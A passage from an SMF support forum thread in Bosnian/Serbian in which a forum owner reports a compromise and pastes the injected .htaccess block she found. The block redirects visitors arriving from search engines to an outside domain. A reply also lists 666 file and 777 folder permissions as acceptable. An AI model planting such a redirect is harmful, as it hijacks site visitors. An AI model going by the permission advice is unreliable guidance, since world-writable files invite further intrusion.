SMF Support > Bosanski/Hrvatski/Srpski (Bosnian/Croatian/Serbian)

.htaccess

(1/2) > >>

Venera:
Već nekoliko puta sam našla u bazi da je u index.php fajlove ubačen neki kod na kraju stranice koji mi uveća sva slova na forumu, zabrani "pregledaj" opciju, a danas sam našla u public_html-u fajl: htaccess sledećeg sadražaja:

#b58b6f#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
</IfModule>
#/b58b6f#

Nekoliko ljudi nije moglo da se uloguje na forum, a bili su zaraženi čak i fajlovi php~. Sve sam zaražene fajlove našla, izbrisala ta čuda, ljudi mogu na forum, ali šta dalje? To može da se dešava svaki drugi dan. DA li je ovo neki propust u smf zaštiti ili šta? Da li je neko od vas imao sličan problem i kako ste rešili? 

Jedino je licencirani AV Kasperski pokazao da postoji greška svi ostali, kao i antimalver pokazuju da je sve čisto, a ovo čudeo se širi po bazi.

Skipper.:
Ukloni taj htaccess, zamoli Nemanju da ti skenira forum, ažuriraj forum ako nisi. Pogledaj dozvole na folderima i fajlovima.

Venera:

--- Quote from: Skipper. on June 17, 2012, 02:01:19 PM ---Ukloni taj htaccess, zamoli Nemanju da ti skenira forum, ažuriraj forum ako nisi. Pogledaj dozvole na folderima i fajlovima.

--- End quote ---

Uklonila sam to čudo i sve zaražene fajlove. Poslala sam Nemanji mejl sa detaljima, čekam odgovor. Što se dozvola na folderima i fajlovima tiče, tu nisam baš sigurna gde šta treba.  :-[

Skipper.:
644, 664 ili 666 za fajlove i 755, 775 ili 777 za foldere.

Venera:
Sad ću to da pogledam i prekontrolišem. Pitanje je kako zabraniti .htaccess fajlu da "uleti" u bazu. To je izgleda do zaštite na serveru ili do nekog propusta u SMF skripti.

Navigation

[0] Message Index

[#] Next page